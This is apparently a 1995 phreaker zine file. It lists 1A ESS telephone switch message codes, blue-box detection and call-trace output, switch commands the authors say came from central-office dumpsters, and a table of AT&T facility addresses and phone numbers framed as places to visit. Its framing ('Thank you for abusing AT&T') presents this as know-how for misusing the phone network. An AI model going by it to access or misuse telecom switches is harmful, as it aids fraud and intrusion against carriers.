** SIGNAL IRREGULARITY **
|
||
SIG IRR Blue box detection
|
||
SIG IRR INHIBITED Detector off
|
||
SIG IRR TRAF Half hour report of traffic data
|
||
|
||
** TRAFFIC CONDITION **
|
||
TC15 Reports overall traffic condition
|
||
TL02 Reason test position test was denied
|
||
TL03 Same as above
|
||
|
||
** TRUNK NETWORK **
|
||
TN01 Trunk diagnostic found trouble
|
||
TN02 Dial tone delay alarm failure
|
||
TN04 Trunk diag request from test panel
|
||
TN05 Trunk test procedural report or denials
|
||
TN06 Trunk state change
|
||
TN07 Response to a trunk type and status request
|
||
TN08 Failed incoming or outgoing call
|
||
TN09 Network relay failures
|
||
TN10 Response to TRK-LIST input, usually a request from test position
|
||
TN11 Hourly, status of trunk undergoing tests
|
||
TN16 Daily summary of precut trunk groups
|
||
|
||
** TRAFFIC OVERLOAD CONDITION **
|
||
TOC01 Serious traffic condition
|
||
TOC02 Reports status of less serious overload conditions
|
||
|
||
** TRANSLATION ** (shows class of service, calling features etc.)
|
||
TR01 Translation information, response to VFY-DN
|
||
TR03 Translation information, response to VFY-LEN
|
||
TR75 Translation information, response to VF:DNSVY
|
||
** **
|
||
TW02 Dump of octal contents of memory
|
||
|
||
Trace Output Appearance (COT - Customer Oriented Trace)
|
||
A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED
|
||
CPN 212 382 8923 <-- WHO CALLED
|
||
|
||
01/14/95 22:03:02 <-- TIME/DATE
|
||
#236 <-- JOB NUMBER
|
||
|
||
|
||
Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
|
||
-=-=-=-=-=
|
||
|
||
RMV::NPC 69!
|
||
UTL::QRY.CMAP 136!
|
||
UTL::QRY.SCON to 135! (as far out as to 12003!)
|
||
UTL::QRY.SCON 13615/01!
|
||
UTL::QRY.ALMS!
|
||
UTL::QRY,WHO!
|
||
UTL::QRY,ALL!
|
||
UTL::QRY,FPKG!
|
||
UTL::QRY,UNIT1,FTMI1, EQL
|
||
GRTH::UNIT1! (FT100) <-- comment written by command
|
||
GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example
|
||
UTL::QRY.!
|
||
RMV::LINK 3!
|
||
DGN::LINK 3!
|
||
RST::LINK 3!
|
||
UTL::QRY.TPS!
|
||
|
||
RST::TAPE! (This and the next two commands were
|
||
UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty
|
||
RMV::TAPE! obvious)
|
||
|
||
SDIS::FROM 11204/03.TO 11204/04!
|
||
UTL::QRY.SCON.CH.TO 11204!
|
||
UTL::QRY.CMAP.TO 11204/03!
|
||
UTL::QRY,CMAP 01117!
|
||
SCON::RATE 96.FROM 11204/03.TO 11204/4!
|
||
LOGIN::USER DAX\
|
||
UTL::EQD,NPCS!
|
||
ADD::LINK 2,NPCAD E!
|
||
|
||
UTL::LOC,ETSI 101!
|
||
|_|____________Bay (These show physical locations
|
||
|____________Unit of trunks)
|
||
|
||
UTL::LOC,NPC 01117!
|
||
output - 1-01-38
|
||
|__|__|_________Bay
|
||
|__|_________Unit
|
||
|_________38(1/8) inches
|
||
|
||
|
||
Appendix 3 - Suggested reading
|
||
-=-=-=-=-=
|
||
|
||
Acronyms 1988 (Phrack #20, file 11)
|
||
Central Office Operations by Agent Steal (LoDTJ #4, file 4)
|
||
ESS & 1A Switching Systems by Ninja Master
|
||
The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
|
||
Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
|
||
Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
|
||
Operator Services Position System by Bandito (Phun #5, file 8)
|
||
Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)
|
||
|
||
__________________________________________________________________________
|
||
(C)opywrong 1995, DeadKat Inc.
|
||
All wrongs denied.
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> Thank you for abusing AT&T <20>
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Part II
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> by Major & Dead Kat
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
|
||
|
||
Some of the "Frequently Visited AT&T Locations":
|
||
|
||
LOCATION CITY ST/ZIP TELEPHONE
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~
|
||
AT&T 1 PERIMETER PARK S. BIRMINGHAM AL 35243 205-969-4000
|
||
BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243 205-988-9300
|
||
MONTGOMERY MMC 2855 SELMA HIGHWAY MONTGOMERY AL 36108 205-281-6200
|
||
AT&T 3280 DAUPHIN ST., BLDG B MOBILE AL 36606 205-470-1000
|
||
LITTLE ROCK WORKS 7600 INTERSTATE #30 LTTL ROCK AR 72209 501-569-4411
|
||
AT&T 10825 #2 FINANCIAL CNTR. SUITE 300 LTTL ROCK AR 72211 501-223-1000
|
||
PHOENIX WORKS 505 N.51ST AVE PHOENIX AZ 85002 602-233-5000
|
||
AT&T MICROELECT. SALES 432 N. 44TH ST. PHOENIX AZ 85008 602-204-1100
|
||
PHOENIX CAC 3750 W. INDIAN SCHOOL RD. PHOENIX AZ 85019 602-269-6666
|
||
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-481-9100
|
||
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-482-5799
|
||
LOS ANGELES CP (SVC) 2400 YATES AVE L.A. CA 90040 213-726-5000
|
||
CYPRESS INNST. 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6200
|
||
AT&T MICROELEC. SLES 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6223
|
||
AT&T 200 NO. WESTLAKE BLVD. SUITE 103 TH.OAKS CA 91362 805-373-9390
|
||
VANDENBURG AFB FED. SYS LOMPOC CA 93437 805-866-1611
|
||
AT&T FED SYS 3201 SKYWAY DR. SAN MONICA CA 93455 805-349-8649
|
||
AT&T 1111 E. HERNDON AVE. SUITE 31 FRESNO CA 93710 209-449-4200
|
||
AT&T SAND HILL RD SUITE 216 MENLO PARK CA 94025 415-324-6000
|
||
AT&T 224 AIRPORT PKWY SAN JOSE CA 94086 408-452-3200
|
||
SUNNYVALE REG. CTR. 1090 E. DUANE AVE. SUNNYVALE CA 94086 408-522-4000
|
||
HAYWARD SVC 1288 SAN LUIS OBISPO AVE. HAYWARD CA 94544 415-475-5000
|
||
AT&T 4430 ROSEWOOD DR. PLEASANTON CA 94566 415-224-1000
|
||
AT&T 1717 DOOLITTLE DR. SN LEANDRO CA 94577 415-678-1000
|
||
SAN RAMON AMO BLD 2440 CAMINO RAMON SAN RAMON CA 94583 415-830-4300
|
||
AT&T 2201 BROADWAY OAKLAND CA 94612 415-273-2800
|
||
PACIFIC REGION MMC 3301 INDUSTRIAL AVE. ROCKLIN CA 95677 916-645-8911
|
||
AT&T 8950 CALIFORNIA CNTR. DR. SACRAMENTO CA 95826 916-361-4600
|
||
DENVER SVC CNTR. 11900 E. CORNELL AVE. AURORA CO 80014 303-368-2000
|
||
AT&T 3190 S. VAUGHN WAY AURORA CO 80014 303-695-5000
|
||
AT&T BMG 6200 S. SYRACUSE WAY ENGLEWOOD CO 80111 303-850-7000
|
||
AT&T-NS SALES 707 17TH ST. DENVER CO 80202 303-291-4001
|
||
DENVER SVC 2551 E. 40TH AVE. DENVER CO 80205 303-291-4200
|
||
DENVER WORKS 1200 W. 120TH AVE DENVER CO 80234 303-538-1200
|
||
AT&T-BL DENVER NO. 12110 PECOS ST. WESTMNSTR CO 80234 303-538-1813
|
||
AT&T-BL 11900 N. PECOS ST. DENVER CO 80234 303-538-4011
|
||
AT&T 7979 E. TUFTS AVE. DENVER CO 80237 303-290-3100
|
||
AT&T 13952 DENVER WEST PKWY. GOLDEN CO 80401 303-273-2000
|
||
AT&T FED SYS 6200 S. SYRACUSE WAY ENGLEWOOD CO 80401 303-793-8800
|
||
AT&T-NS SALES 6300 GATEWAY DR. CYPRESS CO 90630 714-220-6200
|
||
AT&T 8 TWO MILE RD FARMINGTON CT 06032 203-678-3800
|
||
ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE CT 06477 203-795-4721
|
||
CONNECTICUT AMO 2750 DIXWELL AVE HAMDEN CT 06518 203-287-4070
|
||
AT&T 777 LONGRIDGE RD STAMFORD CT 06851 203-845-5600
|
||
AT&T 1825 I ST. N.W. SUITE 800 WASHINGTON DC 20006 202-429-1300
|
||
WASH-DC 1120 20TH ST.,NW WASHINGTON DC 20006 202-457-2000
|
||
AT&T 222 DELAWARE AVE. WILMINGTON DE 19801 302-888-6000
|
||
AT&T 1401 E. BELMONT ST. PENSACOLA FL 32501 904-432-7454
|
||
AT&T 151 S. WYMORE RD ALTA SPGS. FL 32714 407-869-2200
|
||
AT&T 2301 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
|
||
AT&T 2400 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
|
||
AT&T 850 TRAFALGAR COURT MAITLAND FL 32751 407-660-3200
|
||
AT&T 901 LAKE DESTINY DR. ORLANDO FL 32809 407-875-4400
|
||
AT&T 8221 EXCHANGE DRIVE ORLANDO FL 32809 407-850-3000
|
||
AT&T 6039 S. RIO GRANDE AVE. ORLANDO FL 32809 407-850-8000
|
||
AT&T MICROELECT.9333 S. JOHN YOUNG PKWY ORLANDO FL 32819 407-345-6000
|
||
AT&T 9701 S. JOHN YOUNG PARKWAY ORLANDO FL 32819 407-351-7100
|
||
AT&T 100 WEST CYPRESS CREEK FT. LAUD. FL 33309 305-493-6100
|
||
ATLANTA WKS 2000 NORTHEAST EXPRESSWAY NORCROSS GA 30071 404-447-2000
|
||
AT&T FED SYS. 1975 LAKESIDE PKWAY TUCKER GA 30085 404-496-8200
|
||
AT&T MICROELECT. SALES 3295 RIVER EXCH.DR NORCROSS GA 30092 404-390-5000
|
||
AT&T 1200 PEACHTREE ST. NE ATLANTA GA 30309 404-390-5000
|
||
ATLANTA FOC 7840 ROSEWELL RD. ATLANTA GA 30328 404-390-5000
|
||
ATLANTA S. CTR. 6701 ROSEWELL RD. NE. ATLANTA GA 30328 404-573-4000
|
||
AT&T 2970 CLAIRMONT RD. 4TH FL ATLANTA GA 30329 404-248-2126
|
||
ATLANTA SVC 5885 FULTON IND'L BLVD. SW. ATLANTA GA 30336 404-346-4000
|
||
ATL-ACCTS PAY 365 NORTHRIDGE RD. ATLANTA GA 30338 404-392-8900
|
||
AT&T 2800 CENTURY CTR. PKWY ATLANTA GA 30345 404-320-3800
|
||
ATLANTA DATA SYS 211 PERIMETER CTR. PKWY ATLANTA GA 30346 404-399-0100
|
||
ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA GA 30350 404-390-5000
|
||
AT&T 2300 NORTHLAKE CTR. TUCKER GA 30350 404-496-8200
|
||
AT&T MMC INTERSTATE 80 & HIGHWAY 630 UNDERWOOD IA 51519 712-566-3300
|
||
ROLLING MEADOWS 3800 GOLD RD. ROLNG MDWS IL 60008 708-290-2000
|
||
AT&T MICROELECT. SALES 500 PARK BLVD ITASCA IL 60143 312-855-6300
|
||
AT&T 150 MARTINDALE RD SHAUMBERG IL 60173 708-605-5000
|
||
AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN. W CHICAGO IL 60185 312-293-5100
|
||
AT&T DATA SVCS 180 HANSEN CT. WOODDALE IL 60191 708-860-8100
|
||
AT&T FED SYS 1411 OPUS PLACE DOWNERS GR IL 60515 708-810-4000
|
||
AT&T 1111 W. 22ND ST. OAKBROOK IL 60521 708-571-5320
|
||
UIS SHOWCASE 2600 WARRENVILLE RD. LISLE IL 60532 708-260-7900
|
||
NWSW CTR. 2600 WARRENVILLE RD. LISLE IL 60532 708-510-4000
|
||
NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE LISLE IL 60532 708-510-4000
|
||
LISLE PS 850 WARRENVILLE RD. LISLE IL 60532 708-719-1005
|
||
AT&T LISLE CTR 4513 WESTERN AVE. LISLE IL 60532 708-810-6000
|
||
CEO-WEST 1195 SUMMER HILL DRIVE LISLE IL 60532 708-971-5000
|
||
MONTGOMERY WORKS 800 S. RIVER ST. MONTGOMERY IL 60538 708-859-4000
|
||
WARRENVILLE 28W. 615 FERRY RD. WARRENVILE IL 60555 708-393-8000
|
||
INDIAN HILL COURT 1000 E. WARRENVILLE RD. NAPERVILLE IL 60566 708-305-3000
|
||
IH PARK-BL 200 PARK PLAZA NAPERVILLE IL 60567 708-979-2000
|
||
AT&T ONE S. WACKER DRIVE CHICAGO IL 60606 708-592-6558
|
||
AT&T 11595 N. MERIDIAN ST. CARMEL IN 46032 317-844-6674
|
||
INDIANAPOLIS INST.8700ROBERTS DR SUITE 100 FISCHERS IN 46038 317-578-0160
|
||
INDIANA AMO N. 151 N.DELAWARE ST. SUITE565 INDIANAPOL IN 46204 317-632-9161
|
||
INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219 317-352-0011
|
||
INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST. INDIANAPOL IN 46250 317-845-8980
|
||
AT&T 404 COLUMBIA PLACE-SUITE 210 SOUTH BEND IN 46601 219-232-2000
|
||
KANSAS CITY SVC CNTR. 9501 W. 67TH ST. MERRIAM KS 66203 913-677-6000
|
||
AT&T 5401 COLLEGE BLVD. LEAWOOD KS 66211 913-491-9840
|
||
AT&T 200 NO. BROADWAY, SUITE 400 WICHITA KS 67202 316-269-7500
|
||
AT&T 9300 SHELBYVILLE RD LOUISVILLE KY 40222 502-429-1000
|
||
AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR METAIRIE LA 70002 504-832-4300
|
||
AT&T 4354 S. SHERWOOD FOREST BLVD. BATONROUGE LA 70816 504-922-6600
|
||
AT&T 3010 KNIGHT ST., SUITE 190 SHREVEPORT LA 71105 318-869-2041
|
||
SHREVEPORT WORKS 9595 MANSFIELD RD. SHREVEPORT LA 71108 318-459-6000
|
||
AT&T 365 CADWELL DR. RM 168 SPRINGFLD MA 01104 413-785-4400
|
||
AT&T MICROELECT. 111 SPEEN ST. FRAMINGHAM MA 01701 508-626-2161
|
||
ANDOVER 20 SHATTUCK RD. ANDOVER MA 01810 508-691-3000
|
||
AT&T-WARD HILL 75 FOUNDATION AVE. WARD HILL MA 01835 508-374-5600
|
||
MERRIMACK VALLEY 1600 OSGOOD ST. N.ANDOVER MA 01845 508-960-2000
|
||
AT&T ACCT MGMT 800 BOYLESTON ST. BOSTON MA 02110 617-437-8800
|
||
AT&T-BL 800 BOYLESTON ST. BOSTON MA 02110 617-437-8870
|
||
AT&T NAT'L ACCTS 100 SUMMER ST. BOSTON MA 02110 617-574-6000
|
||
NEW ENGLAND SVC 705 MT. AUBURN ST. WATERTOWN MA 02172 617-923-0765
|
||
AT&T 430 BEDFORD ST. LEXINGTON MA 02173 617-863-9000
|
||
BETHESDA AMO 6410 ROCKLEDGE DR. BETHESDA MD 20817 301-493-2000
|
||
AT&T FED SYS 1100 WAYNE AVE SLVR SPGS MD 20910 301-495-7400
|
||
COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030 301-584-1234
|
||
FEDERAL SYS. MD 9160 GUILFORD RD COLUMBIA MD 21045 301-369-7700
|
||
COULUMBIA MD 9305D GERWIG LN. COLUMBIA MD 21046 301-381-6150
|
||
AT&T 400 EAST PRATT ST. BALTIMORE MD 21202 301-576-5700
|
||
TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST. BALTIMORE MD 21230 301-385-0425
|
||
AT&T 136 COMMERCIAL ST., FLR 2 PORTLAND ME 04101 207-761-1400
|
||
AT&T 26957 NORTHWESTERN HWY. SOUTHFIELD MI 48034 313-353-6210
|
||
AT&T-NS 27777 FRANKLIN RD., SUITE 500 SOUTHFIELD MI 48034 313-355-7200
|
||
NILES MMC 2121 W. CHICAGO RD. NILES MI 49120 616-684-6400
|
||
AT&T 2861 CHARLEROIX, S.E. GRAND RPDS MI 49546 616-957-8200
|
||
AT&T 4480 W. ROUNDLAKE RD. ARDEN HLLS MN 55112 612-633-4803
|
||
MINNEAPOLIS SC 2230 COUNTY RD. H2 MOUNDSVIEW MN 55112 612-780-7750
|
||
AT&T 420 THIRD AVE. S., RM 670 MINEAPOLIS MN 55415 612-626-9300
|
||
AT&T MICROELECT. SALES W 82ND ST BLOOMINGTN MN 55431 612-885-4600
|
||
BALLWIN 1111 WOODS MILL RD. BALLWIN MO 63011 314-891-2000
|
||
ST.LOUIS-NS 701 MARKET ST. SUITE 900 ST. LOUIS MO 63101 314-891-5000
|
||
AT&T 400 S. WOODS MILL RD. CHSTRFLD MO 63107 314-275-1400
|
||
AT&T 424 S. WOODS MILL RD. CHSTRFLD MO 63107 314-469-2500
|
||
KANSAS CITY WORKS 777 N. BLUE PKWY LEESSUMMIT MO 64063 816-251-4000
|
||
KANSAS CITY AMO 1100 WALNUT ST. KANSASCITY MO 64141 816-654-4000
|
||
NC WORKS 3300 LEXINGTON RD. S.E. WIN-SALEM NC 27102 919-784-1110
|
||
REYNOLDA RD. (DDO) 2400 REYNOLDA RD. WIN-SALEM NC 27106 919-727-3100
|
||
BURLINGOTN NC 204 GRAHAM-HOPEDALE RD. BURLINGTON NC 27215 919-228-3000
|
||
GUILFORD CTR. I-85 MT HOPE CHURCH RD. MCLEANSVLE NC 27301 919-279-7000
|
||
NS 1701 PINECROFT RD. GREENSBORO NC 27407 919-855-2775
|
||
AT&T 7031 ALBERT PICK RD., SUITE 300 GREENSBORO NC 27409 919-668-1800
|
||
AT&T ENGR. 3330 W. FRIENDLY AVE. GREENSBORO NC 27410 919-379-5301
|
||
AT&T MICROELECT. SALES 5400 GLENWOOD RD. RALEIGH NC 27612 919-881-8023
|
||
AT&T 6701-A NORTHPARK BLVD. CHARLOTTE NC 28216 704-597-3050
|
||
AT&T 2 CENTRAL PARK PLAZA OMAHA NE 68102 402-595-5001
|
||
OMAHA AMO 222 S. 15th.ST, SUITE 200 S. OMAHA NE 68124 402-595-5001
|
||
OMAHA WORKS 120 & 1 ST OMAHA NE 68137 402-691-3000
|
||
AT&T 10843 OLD MILL RD OMAHA NE 68154 402-334-6000
|
||
AT&T 4 BEDFORD FARMS BEDFORD NH 03102 603-623-6100
|
||
SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON NH 03801 603-436-6100
|
||
PARSIPPANY 260 CHERRY HILL RD. PARSIPPANY NJ 07054 201-299-3000
|
||
PARSIPPANY 4 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-428-7700
|
||
PARSIPPANY CP 5 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-581-3000
|
||
AT&T 99 JEFFERSON RD. WOODHOLLOW III PARSIPPANY NJ 07054 201-581-5600
|
||
AT&T 4 CAMPUS DRIVE PARSIPPANY NJ 07054 201-829-1000
|
||
AT&T 700 LANIDEX PLAZA PARSIPPANY NJ 07054 201-884-7000
|
||
AT&T 1515 RTE 10 PARSIPPANY NJ 07054 201-993-4200
|
||
LIBERTY CORNER 184 LIBERTY CORNER RD WARREN NJ 07060 201-580-4000
|
||
AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD. WARREN NJ 07060 201-756-1527
|
||
CLARK SHOPS 100 TERMINAL AVE. CLARK NJ 07066 201-396-4000
|
||
SHORT HILLS BELL LABS 101 JFK PKWY SHORTHILLS NJ 07078 201-564-2000
|
||
AT&T 5000 HADLEY RD SO.PLNFLD NJ 07080 201-668-3200
|
||
QUALITY MGMT ENGIN. 650 LIBERTY AVE. UNION NJ 07083 201-851-3333
|
||
AT&T 1480 ROUTE 9 N. WOODBRIDGE NJ 07095 201-750-3100
|
||
TWO GATEWAY CTR. NEWARK NJ 07102 201-468-6000
|
||
FREEHOLD AT&T JUNIPER PLAZA RT.9 FREEHOLD NJ 07728 201-577-5000
|
||
AT&T-BL CRAWFORD HILL KEYPORT RD. HOLMDEL NJ 07733 201-888-7000
|
||
AT&T-BL CRAWFORDS CORNER RD HOLDMEL NJ 07733 201-957-2000
|
||
AT&T 307 MIDDLETOWN-LINCROFT RD. LINCROFT NJ 07738 201-576-4000
|
||
RED HILL-BL 480 RED HILL RD MIDDLETOWN NJ 07748 201-949-3000
|
||
AT&T 200 LAUREL AVE MIDDLETOWN NJ 07748 201-957-2000
|
||
W. LONG BRANCH 185 MONMOUTH PKWY W.LG.BRNCH NJ 07764 201-870-7000
|
||
SUMMIT 190 RIVER RD. SUMMIT NJ 07901 201-522-6555
|
||
AT&T 233 MT. AIRY RD BSK RDGE NJ 07920 201-204-4000
|
||
AT&T 188 MT. AIRY RD BSK RDGE NJ 07920 201-221-2000
|
||
BASKING RIDGE 295 NO. MAPLE AVE. BSK RDGE NJ 07920 201-221-2000
|
||
AT&T 131 MORRISTOWN RD BSK RDGE NJ 07920 201-953-3900
|
||
AT&T RMC 222 MT. AIRY RD BSK RDGE NJ 07920 201-953-5300
|
||
AT&T INTNAT'L MT. KEMBLE AVE BSK RDGE NJ 07920 201-953-7000
|
||
AT&T-COMM. TR. 202-206N. BEDMINSTER NJ 07921 201-234-4000
|
||
BERKELEY HEIGHTS 1 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
|
||
BERKELEY HEIGHTS 2 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
|
||
BERNARDSVILLE 4 ESSEX AVE BERNARDSVL NJ 07924 201-204-2701
|
||
AT&T-BL NORTH RD CHESTER NJ 07930 201-879-3400
|
||
MT. KEMBLE PLAZA 340 RTE. 202 S. MORRISTOWN NJ 07960 201-326-2000
|
||
AT&T CAPITAL CORP. 44 WHIPPANY RD. MORRISTOWN NJ 07960 201-397-3000
|
||
MORRISTOWN AMO 111 MADISON AVE. MORRISTOWN NJ 07960 201-631-3700
|
||
AT&T 412 MOUNT KEMBLE AVE. MORRISTOWN NJ 07960 201-644-6000
|
||
AT&T 60 COLUMBIA TRNPK MORRISTOWN NJ 07960 201-829-7200
|
||
MORRIS BELL LABS 25 LINDSLEY DR. MORRISTOWN NJ 07960 201-898-1000
|
||
AT&T 1 SPEEDWELL AVE. MORRISTOWN NJ 07960 201-898-2000
|
||
AT&T 1776 ON THE GREEN MORRISTOWN NJ 07960 201-898-6000
|
||
AT&T 100 SOUTHGATE PARKWAY MORRISTOWN NJ 07960 201-898-8000
|
||
SOUTH GATE 475 SOUTH ST. MORRISTOWN NJ 07962 201-606-2000
|
||
MURRAY HILL 600 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-582-3000
|
||
AT&T-T 40 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-665-7000
|
||
WHIPPANY BELL LABS WHIPPANY RD WHIPPANY NJ 07981 201-386-3000
|
||
PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY PENNSAUKEN NJ 08110 609-488-9020
|
||
HOPEWELL-ERC CARTER RD. HPWL TNSHP NJ 08525 609-639-1234
|
||
HOPEWELL-CEC CARTER RD. HPWL TNSHP NJ 08525 609-639-4500
|
||
AT&T 29-C EMMONS DRIVE PRINCETON NJ 08540 609-987-3000
|
||
LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK LRNCVLLE NJ 08648 609-896-4000
|
||
AT&T COMM (IMS) 1300 WHITE HOUSE TRENTON NJ 08690 609-581-1000
|
||
AT&T 745 RT 202/206N BRIDGEWATR NJ 08807 201-231-6000
|
||
AT&T 95 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-5000
|
||
AT&T MARKTG CTR 55 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-6000
|
||
AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS ISELIN NJ 08830 201-855-8000
|
||
AT&T 80 NORTHFIELD AVE. EDISON NJ 08837 201-225-8700
|
||
AT&T 20 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-1028
|
||
AT&T 30 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-2000
|
||
AT&T 180 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-6000
|
||
AT&T CORP ED. 140 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-7000
|
||
AT&T 371 HOES LN. PISCATAWAY NJ 08854 201-463-2200
|
||
AT&T 242 OLD NEW BRUNSWICK RD PISCATAWAY NJ 08854 201-562-6900
|
||
AT&T 100 ATRIUM WAY SOMERSET NJ 08873 201-560-1300
|
||
AT&T PIXEL MACHINES 1 EXEC.DR. SOMERSET NJ 08873 201-563-2200
|
||
HOLMDEL-BL CRAWFORDS CORNER RD HOLMDEL NJ 07733 201-949-3000
|
||
AT&T 1001 MENAUL BLVD. N.E. B345 ALBUQURQUE NM 87107 505-761-6300
|
||
SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E. ALBUQURQUE NM 87123 505-844-5678
|
||
AT&T 220 EDISON WAY RENO NV 89502 702-239-7015
|
||
AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS NEW YORK NY 10013 212-219-6396
|
||
AT&T-NYC 22 CORTLANDT ST. NEW YORK NY 10017 212-393-9800
|
||
550 MADISON AVE. NEW YORK NY 10022 212-605-5500
|
||
NS ONE PENN PLAZA SUITE 5420 NEW YORK NY 10119 212-714-5900
|
||
AT&T 2 MANHATTANVILLE RD. PURCHASE NY 10577 914-251-0700
|
||
SUFFERN MMC 22 HEMION RD. SUFFERN NY 10901 914-577-6600
|
||
AT&T 520 BROAD HOLLOW RD. MELVILLE NY 11747 516-420-3000
|
||
ALBANY 11 26 AVIATION RD. ALBANY NY 12205 518-489-4615
|
||
AT&T 16 CORPORATE WOODS BLVD. ALBANY NY 12211 518-447-6900
|
||
AT&T 2 JEFFERSON PLAZA, FLR 2 POUGHKEPSE NY 12601 914-485-7744
|
||
AT&T MARKETING 6597 KINNE RD SYRACUSE NY 13214 315-445-3800
|
||
AT&T 300 PEARL ST. OLYMPIA TOWERS BUFFALO NY 14202 716-849-6000
|
||
BUFFALO INSTALL. 25 JOHN GLENN DR. AMHERST NY 14228 716-691-2711
|
||
AT&T 1 MARINE MIDLAND PLZ. ROCHESTER NY 14604 716-777-4400
|
||
CET 5151 BLAZER MEM. PKWY DUBLIN OH 43017 614-764-5454
|
||
COLUMBUS WORKS 6200 E. BROAD ST. COLUMBUS OH 43213 614-860-2000
|
||
AT&T ONE SEAGATE, SUITE 750 TOLEDO OH 43604 419-245-3700
|
||
